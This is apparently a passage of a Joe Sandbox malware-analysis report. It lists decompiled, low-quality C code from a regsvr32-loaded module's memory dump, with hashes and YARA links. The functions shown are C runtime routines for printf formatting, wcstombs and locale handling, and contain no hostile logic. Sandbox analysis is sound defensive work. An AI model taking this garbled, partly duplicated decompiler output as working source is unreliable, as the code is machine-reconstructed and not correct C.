				_a80 = _a80 | 0x00000010;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xf");
				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
				_a1096 = _a1096 + 2;
				asm("bts eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
				_a1096 = _a1096 + 2;
				asm("btr eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
				goto 0xf9d3bfbe;
				_a704 = 0;
				goto E000007FE7FEF9D3BB66;
				goto 0xf9d3bfd9;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xb");
				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
				goto __rax;
			}





                                    0x7fef9d3bdf2
                                    0x7fef9d3bdf4
                                    0x7fef9d3be01
                                    0x7fef9d3be0a
                                    0x7fef9d3be0c
                                    0x7fef9d3be14
                                    0x7fef9d3be29
                                    0x7fef9d3be3a
                                    0x7fef9d3be49
                                    0x7fef9d3be53
                                    0x7fef9d3be61
                                    0x7fef9d3be6b
                                    0x7fef9d3be71
                                    0x7fef9d3be84
                                    0x7fef9d3be91
                                    0x7fef9d3be9d
                                    0x7fef9d3bea5
                                    0x7fef9d3beae
                                    0x7fef9d3beb2
                                    0x7fef9d3bebb
                                    0x7fef9d3bed1
                                    0x7fef9d3bee2
                                    0x7fef9d3bef0
                                    0x7fef9d3befc
                                    0x7fef9d3bf04
                                    0x7fef9d3bf17
                                    0x7fef9d3bf28
                                    0x7fef9d3bf36
                                    0x7fef9d3bf42
                                    0x7fef9d3bf4a
                                    0x7fef9d3bf5a
                                    0x7fef9d3bf6a
                                    0x7fef9d3bf7a
                                    0x7fef9d3bf8a
                                    0x7fef9d3bf9a
                                    0x7fef9d3bfaa
                                    0x7fef9d3bfac
                                    0x7fef9d3bfae
                                    0x7fef9d3bfb9
                                    0x7fef9d3bfbe
                                    0x7fef9d3bfc7
                                    0x7fef9d3bfcb
                                    0x7fef9d3bfd1
                                    0x7fef9d3bfe6
                                    0x7fef9d3bff7
                                    0x7fef9d3c006
                                    0x7fef9d3c02d

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                    • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2576288505-192189897
                                    • Opcode ID: 9b0d14d024408deea39e0a17da6f412b88ec8238870ee572ebff0cd3a83ccddf
                                    • Instruction ID: ff5535f435e3edde8ece23b3de1a4987682526c6b5e3102cfdc31443931d3947
                                    • Opcode Fuzzy Hash: 9b0d14d024408deea39e0a17da6f412b88ec8238870ee572ebff0cd3a83ccddf
                                    • Instruction Fuzzy Hash: D9416B72A0DAC28AE3F0DB24E8947BEB7E4E380345F600126D2DD869A9DB3DD541CF00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3DD95 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 24%
                                    			E000007FE7FEF9D3DD95(signed int _a80, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
				void* _t113;
				char* _t133;

				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
				_t133 =  &_a1560;
				_a116 = E000007FE7FEF9D31E40(_t133);
				if (_a116 >= 0) goto 0xf9d3ddc2;
				_a116 = 0xffffffff;
				goto 0xf9d3dddb;
				_a116 = _t113 + _t133 - 0x30;
				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0xf9d3de66;
				if (_a1408 == 0x68) goto 0xf9d3df6f;
				if (_a1408 == 0x6c) goto 0xf9d3de24;
				if (_a1408 == 0x77) goto 0xf9d3df7c;
				goto 0xf9d3df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0xf9d3de61;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
				goto 0xf9d3df6d;
				_a1216 = 0;
				goto E000007FE7FEF9D3DC41;
				goto 0xf9d3df88;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
				goto __rax;
			}





                                    0x7fef9d3dda0
                                    0x7fef9d3dda2
                                    0x7fef9d3ddaf
                                    0x7fef9d3ddb8
                                    0x7fef9d3ddba
                                    0x7fef9d3ddc2
                                    0x7fef9d3ddd7
                                    0x7fef9d3dde8
                                    0x7fef9d3ddf7
                                    0x7fef9d3de01
                                    0x7fef9d3de0f
                                    0x7fef9d3de19
                                    0x7fef9d3de1f
                                    0x7fef9d3de32
                                    0x7fef9d3de40
                                    0x7fef9d3de4c
                                    0x7fef9d3de54
                                    0x7fef9d3de5d
                                    0x7fef9d3de61
                                    0x7fef9d3de6a
                                    0x7fef9d3de80
                                    0x7fef9d3de91
                                    0x7fef9d3de9f
                                    0x7fef9d3deab
                                    0x7fef9d3deb3
                                    0x7fef9d3dec6
                                    0x7fef9d3ded7
                                    0x7fef9d3dee5
                                    0x7fef9d3def1
                                    0x7fef9d3def9
                                    0x7fef9d3df09
                                    0x7fef9d3df19
                                    0x7fef9d3df29
                                    0x7fef9d3df39
                                    0x7fef9d3df49
                                    0x7fef9d3df59
                                    0x7fef9d3df5b
                                    0x7fef9d3df5d
                                    0x7fef9d3df68
                                    0x7fef9d3df6d
                                    0x7fef9d3df76
                                    0x7fef9d3df7a
                                    0x7fef9d3df80
                                    0x7fef9d3df95
                                    0x7fef9d3dfa6
                                    0x7fef9d3dfb5
                                    0x7fef9d3dfdc

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                    • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2576288505-734865713
                                    • Opcode ID: e93e5a5da9d23810187a949f5699427fbde4a421f2c98764f5e18462d0498a04
                                    • Instruction ID: 23759b0de1675013ddf4d03c0cfaf8b870fc7ca6517f58e2c4ab95e624369fc8
                                    • Opcode Fuzzy Hash: e93e5a5da9d23810187a949f5699427fbde4a421f2c98764f5e18462d0498a04
                                    • Instruction Fuzzy Hash: E5415EB2A0C6C28AE7F09B64E8407BE72E4F384746F600125D6C9875E9DB3DD445CF14
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D26C32 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 83COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invoke_watson_if_oneof_swprintf_p
                                    • String ID: %.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                    • API String ID: 2731067127-3604075083
                                    • Opcode ID: a5e89465a157929821ec7ea19f55365b45851ed2ed8ce63167a36004212f5177
                                    • Instruction ID: 5622a3d1d015b06430e144c3880eb2afd9b3a378503d823bdd7d048160e8afa8
                                    • Opcode Fuzzy Hash: a5e89465a157929821ec7ea19f55365b45851ed2ed8ce63167a36004212f5177
                                    • Instruction Fuzzy Hash: BB413C72A0D7C186E7A49B51E8907AEBBA1F784740FA14126D6CD47BA9DB3ED404CF10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D34F20 Relevance: 9.1, APIs: 6, Instructions: 123COMMONLIBRARYCODE
                                    Download Yara Rule
                                    C-Code - Quality: 41%
                                    			E000007FE7FEF9D34F20(long long __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24, signed int _a32) {
				void* _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				void* _v56;
				signed int _v72;
				long long _v80;
				signed int _v88;
				void* _t88;
				void* _t89;
				void* _t90;
				void* _t92;
				void* _t93;
				void* _t101;
				long long _t113;
				intOrPtr _t116;
				void* _t117;
				long long _t118;
				long long _t121;
				long long _t122;
				long long _t125;
				void* _t164;

				_t113 = __rax;
				_a32 = r9d;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_v88 = E000007FE7FEF9D33B70(_a8, _a16, _a24);
				E000007FE7FEF9D2E680(_t79, _t113);
				_v80 = _t113;
				0xf9d24000();
				_v56 = _t113 + 0x100;
				 *_v56 =  *_v56 + 1;
				if (_v88 == 0xffffffff) goto 0xf9d35103;
				if (_v88 - _a32 <= 0) goto 0xf9d35103;
				if (_v88 - 0xffffffff <= 0) goto 0xf9d34fb9;
				_t116 = _a24;
				if (_v88 -  *((intOrPtr*)(_t116 + 4)) >= 0) goto 0xf9d34fb9;
				goto 0xf9d34fbe;
				E000007FE7FEF9D2E680(E000007FE7FEF9D2CF80(_t116), _t116);
				_t117 = _t116 +  *((intOrPtr*)(_a24 + 8));
				_v72 =  *((intOrPtr*)(_t117 + _v88 * 8));
				_t88 = E000007FE7FEF9D2E680( *((intOrPtr*)(_t117 + _v88 * 8)), _t117);
				_t118 = _t117 +  *((intOrPtr*)(_a24 + 8));
				if ( *((intOrPtr*)(_t118 + 4 + _v88 * 8)) == 0) goto 0xf9d35038;
				_t89 = E000007FE7FEF9D2E680(_t88, _t118);
				_v48 = _t118;
				_t90 = E000007FE7FEF9D2E680(_t89, _t118);
				_t121 = _v48 +  *((intOrPtr*)(_t118 +  *((intOrPtr*)(_a24 + 8)) + 4 + _v88 * 8));
				_v40 = _t121;
				goto 0xf9d35041;
				_v40 = 0;
				if (_v40 == 0) goto 0xf9d350f4;
				r9d = _v72;
				_t92 = E000007FE7FEF9D2E680(E000007FE7FEF9D33BD0(_t90, _a8, _a16, _a24), _t121);
				_t122 = _t121 +  *((intOrPtr*)(_a24 + 8));
				if ( *((intOrPtr*)(_t122 + 4 + _v88 * 8)) == 0) goto 0xf9d350c9;
				_t93 = E000007FE7FEF9D2E680(_t92, _t122);
				_v32 = _t122;
				E000007FE7FEF9D2E680(_t93, _t122);
				_t125 = _v32 +  *((intOrPtr*)(_t122 +  *((intOrPtr*)(_a24 + 8)) + 4 + _v88 * 8));
				_v24 = _t125;
				goto 0xf9d350d2;
				_v24 = 0;
				r8d = 0x103;
				E000007FE7FEF9D2E6C0(E000007FE7FEF9D3D7E0(_v24, _a8, _t164), _t125, _v80);
				goto 0xf9d350f6;
				_v88 = _v72;
				goto 0xf9d34f83;
				0xf9d24000();
				if ( *((intOrPtr*)(_t125 + 0x100)) <= 0) goto 0xf9d35131;
				0xf9d24000();
				_v16 = _t125 + 0x100;
				 *_v16 =  *_v16 - 1;
				if (_v88 == 0xffffffff) goto 0xf9d3514a;
				if (_v88 - _a32 <= 0) goto 0xf9d3514a;
				_t101 = E000007FE7FEF9D2CF80(_v16);
				r9d = _v88;
				return E000007FE7FEF9D33BD0(_t101, _a8, _a16, _a24);
			}


























                                    0x7fef9d34f20
                                    0x7fef9d34f20
                                    0x7fef9d34f25
                                    0x7fef9d34f2a
                                    0x7fef9d34f2f
                                    0x7fef9d34f55
                                    0x7fef9d34f59
                                    0x7fef9d34f5e
                                    0x7fef9d34f63
                                    0x7fef9d34f6e
                                    0x7fef9d34f81
                                    0x7fef9d34f88
                                    0x7fef9d34f99
                                    0x7fef9d34fa4
                                    0x7fef9d34fa6
                                    0x7fef9d34fb5
                                    0x7fef9d34fb7
                                    0x7fef9d34fbe
                                    0x7fef9d34fcf
                                    0x7fef9d34fda
                                    0x7fef9d34fde
                                    0x7fef9d34fef
                                    0x7fef9d34ffc
                                    0x7fef9d34ffe
                                    0x7fef9d35003
                                    0x7fef9d35008
                                    0x7fef9d3502e
                                    0x7fef9d35031
                                    0x7fef9d35036
                                    0x7fef9d35038
                                    0x7fef9d35047
                                    0x7fef9d3504d
                                    0x7fef9d3506f
                                    0x7fef9d35080
                                    0x7fef9d3508d
                                    0x7fef9d3508f
                                    0x7fef9d35094
                                    0x7fef9d35099
                                    0x7fef9d350bf
                                    0x7fef9d350c2
                                    0x7fef9d350c7
                                    0x7fef9d350c9
                                    0x7fef9d350d2
                                    0x7fef9d350ef
                                    0x7fef9d350f4
                                    0x7fef9d350fa
                                    0x7fef9d350fe
                                    0x7fef9d35103
                                    0x7fef9d3510f
                                    0x7fef9d35111
                                    0x7fef9d3511c
                                    0x7fef9d3512f
                                    0x7fef9d35136
                                    0x7fef9d35143
                                    0x7fef9d35145
                                    0x7fef9d3514a
                                    0x7fef9d35170

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: State$_inconsistency$BaseControlCurrentFromImage
                                    • String ID:
                                    • API String ID: 2452617236-0
                                    • Opcode ID: 03736bbfa20cfa1d6e80738f38b28c8345d2a0856ef117f7f635166efef2818c
                                    • Instruction ID: 79c6626e7a9320abdad6ed0e53fbdedc274fcc22452831ee93149e628ab3cd95
                                    • Opcode Fuzzy Hash: 03736bbfa20cfa1d6e80738f38b28c8345d2a0856ef117f7f635166efef2818c
                                    • Instruction Fuzzy Hash: EC61F132A0DA8586DAB0DB55E45177EB3A0F7C4789F214625E6CD83B6ACB3ED441CB40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D29F20 Relevance: 9.0, APIs: 6, Instructions: 46COMMONLIBRARYCODE
                                    Download Yara Rule
                                    C-Code - Quality: 27%
                                    			E000007FE7FEF9D29F20(intOrPtr __ecx, intOrPtr* __rax, intOrPtr _a8) {
				long long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				char _v64;
				long long _v72;
				intOrPtr _t29;
				intOrPtr* _t41;

				_t41 = __rax;
				_a8 = __ecx;
				_v16 = 0xfffffffe;
				_v72 = 0;
				0xf9d266b0();
				 *0xf9d4cd68 = 0;
				if (_a8 != 0xfffffffe) goto 0xf9d29f81;
				 *0xf9d4cd68 = 1;
				_v32 = GetOEMCP();
				E000007FE7FEF9D26800( &_v64);
				goto 0xf9d29fe3;
				if (_a8 != 0xfffffffd) goto 0xf9d29fae;
				 *0xf9d4cd68 = 1;
				_v28 = GetACP();
				E000007FE7FEF9D26800( &_v64);
				_t29 = _v28;
				goto 0xf9d29fe3;
				if (_a8 != 0xfffffffc) goto 0xf9d29fe3;
				 *0xf9d4cd68 = 1;
				E000007FE7FEF9D26840(_t29,  &_v64);
				_v24 =  *((intOrPtr*)( *_t41 + 4));
				E000007FE7FEF9D26800( &_v64);
				goto 0xf9d29ff9;
				_v20 = _a8;
				E000007FE7FEF9D26800( &_v64);
				return _v20;
			}












                                    0x7fef9d29f20
                                    0x7fef9d29f20
                                    0x7fef9d29f28
                                    0x7fef9d29f31
                                    0x7fef9d29f44
                                    0x7fef9d29f4a
                                    0x7fef9d29f59
                                    0x7fef9d29f5b
                                    0x7fef9d29f6b
                                    0x7fef9d29f74
                                    0x7fef9d29f7f
                                    0x7fef9d29f86
                                    0x7fef9d29f88
                                    0x7fef9d29f98
                                    0x7fef9d29fa1
                                    0x7fef9d29fa6
                                    0x7fef9d29fac
                                    0x7fef9d29fb3
                                    0x7fef9d29fb5
                                    0x7fef9d29fc4
                                    0x7fef9d29fcf
                                    0x7fef9d29fd8
                                    0x7fef9d29fe1
                                    0x7fef9d29fe7
                                    0x7fef9d29ff0
                                    0x7fef9d29ffd

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_
                                    • String ID:
                                    • API String ID: 1901436342-0
                                    • Opcode ID: 69024ba52bd34e7b32b0e788ec4f64afe9409c237456bc3d803b93947163d83b
                                    • Instruction ID: 704f50b174c78f8dad9e9ad97ccd9f8c7b4629f2dc49822da5bcfb1c8acb2663
                                    • Opcode Fuzzy Hash: 69024ba52bd34e7b32b0e788ec4f64afe9409c237456bc3d803b93947163d83b
                                    • Instruction Fuzzy Hash: 2E21A732D0C64186E7A09B28E84436EBBA0E784768F614226E3DD426F9DB7ED545CF41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3809F Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 115COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: P$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c$sizeInBytes > retsize
                                    • API String ID: 2123368286-552404435
                                    • Opcode ID: 2c731414488d35c21f2780f328146d5dcf70469cadf2ee42e60feab36cc6bb66
                                    • Instruction ID: b798cd5c2606ce723a50a96b999359d63c775ee68ba37fd19eb3efa8b303dc8f
                                    • Opcode Fuzzy Hash: 2c731414488d35c21f2780f328146d5dcf70469cadf2ee42e60feab36cc6bb66
                                    • Instruction Fuzzy Hash: C2511936A0DBC586E6B48B19E84476EB3E0F386761F204225D6ED43BE8DF7ED4458B01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3BCBD Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 89COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 28%
                                    			E000007FE7FEF9D3BCBD(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a968, char _a972, signed int _a976, void* _a1096, char _a1112) {
				void* _t184;
				char* _t204;
				char* _t205;

				_a112 = 0;
				_a108 = _a112;
				_a88 = _a108;
				_a92 = _a88;
				_a80 = 0;
				_a116 = 0xffffffff;
				_a76 = 0;
				_a968 = _a696 & 0x000000ff;
				if (_a968 == 0x20) goto 0xf9d3bd57;
				if (_a968 == 0x23) goto 0xf9d3bd64;
				if (_a968 == 0x2b) goto 0xf9d3bd4a;
				if (_a968 == 0x2d) goto 0xf9d3bd3d;
				if (_a968 == 0x30) goto 0xf9d3bd72;
				goto 0xf9d3bd7d;
				_a80 = _a80 | 0x00000004;
				goto 0xf9d3bd7d;
				_a80 = _a80 | 0x00000001;
				goto 0xf9d3bd7d;
				_a80 = _a80 | 0x00000002;
				goto 0xf9d3bd7d;
				asm("bts eax, 0x7");
				goto 0xf9d3bd7d;
				_a80 = _a80 | 0x00000008;
				if (_a696 != 0x2a) goto 0xf9d3bdbe;
				_t204 =  &_a1112;
				_a88 = E000007FE7FEF9D31E40(_t204);
				if (_a88 >= 0) goto 0xf9d3bdbc;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0xf9d3bdd5;
				_a88 = _t184 + _t204 - 0x30;
				_a116 = 0;
				if (_a696 != 0x2a) goto 0xf9d3be16;
				_t205 =  &_a1112;
				_a116 = E000007FE7FEF9D31E40(_t205);
				if (_a116 >= 0) goto 0xf9d3be14;
				_a116 = 0xffffffff;
				goto 0xf9d3be2d;
				_a116 = _t184 + _t205 - 0x30;
				_a972 = _a696 & 0x000000ff;
				if (_a972 == 0x49) goto 0xf9d3beb7;
				if (_a972 == 0x68) goto 0xf9d3bfc0;
				if (_a972 == 0x6c) goto 0xf9d3be76;
				if (_a972 == 0x77) goto 0xf9d3bfcd;
				goto 0xf9d3bfd9;
				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
				_a1096 = _a1096 + 1;
				asm("bts eax, 0xc");
				goto 0xf9d3beb2;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xf");
				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
				_a1096 = _a1096 + 2;
				asm("bts eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
				_a1096 = _a1096 + 2;
				asm("btr eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
				goto 0xf9d3bfbe;
				_a704 = 0;
				goto E000007FE7FEF9D3BB66;
				goto 0xf9d3bfd9;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xb");
				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
				goto __rax;
			}






                                    0x7fef9d3bcbd
                                    0x7fef9d3bcc9
                                    0x7fef9d3bcd1
                                    0x7fef9d3bcd9
                                    0x7fef9d3bcdd
                                    0x7fef9d3bce5
                                    0x7fef9d3bced
                                    0x7fef9d3bd02
                                    0x7fef9d3bd11
                                    0x7fef9d3bd1b
                                    0x7fef9d3bd25
                                    0x7fef9d3bd2f
                                    0x7fef9d3bd39
                                    0x7fef9d3bd3b
                                    0x7fef9d3bd44
                                    0x7fef9d3bd48
                                    0x7fef9d3bd51
                                    0x7fef9d3bd55
                                    0x7fef9d3bd5e
                                    0x7fef9d3bd62
                                    0x7fef9d3bd68
                                    0x7fef9d3bd70
                                    0x7fef9d3bd79
                                    0x7fef9d3bd8d
                                    0x7fef9d3bd8f
                                    0x7fef9d3bd9c
                                    0x7fef9d3bda5
                                    0x7fef9d3bdae
                                    0x7fef9d3bdb8
                                    0x7fef9d3bdbc
                                    0x7fef9d3bdd1
                                    0x7fef9d3bdda
                                    0x7fef9d3bdf2
                                    0x7fef9d3bdf4
                                    0x7fef9d3be01
                                    0x7fef9d3be0a
                                    0x7fef9d3be0c
                                    0x7fef9d3be14
                                    0x7fef9d3be29
                                    0x7fef9d3be3a
                                    0x7fef9d3be49
                                    0x7fef9d3be53
                                    0x7fef9d3be61
                                    0x7fef9d3be6b
                                    0x7fef9d3be71
                                    0x7fef9d3be84
                                    0x7fef9d3be91
                                    0x7fef9d3be9d
                                    0x7fef9d3bea5
                                    0x7fef9d3beae
                                    0x7fef9d3beb2
                                    0x7fef9d3bebb
                                    0x7fef9d3bed1
                                    0x7fef9d3bee2
                                    0x7fef9d3bef0
                                    0x7fef9d3befc
                                    0x7fef9d3bf04
                                    0x7fef9d3bf17
                                    0x7fef9d3bf28
                                    0x7fef9d3bf36
                                    0x7fef9d3bf42
                                    0x7fef9d3bf4a
                                    0x7fef9d3bf5a
                                    0x7fef9d3bf6a
                                    0x7fef9d3bf7a
                                    0x7fef9d3bf8a
                                    0x7fef9d3bf9a
                                    0x7fef9d3bfaa
                                    0x7fef9d3bfac
                                    0x7fef9d3bfae
                                    0x7fef9d3bfb9
                                    0x7fef9d3bfbe
                                    0x7fef9d3bfc7
                                    0x7fef9d3bfcb
                                    0x7fef9d3bfd1
                                    0x7fef9d3bfe6
                                    0x7fef9d3bff7
                                    0x7fef9d3c006
                                    0x7fef9d3c02d

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
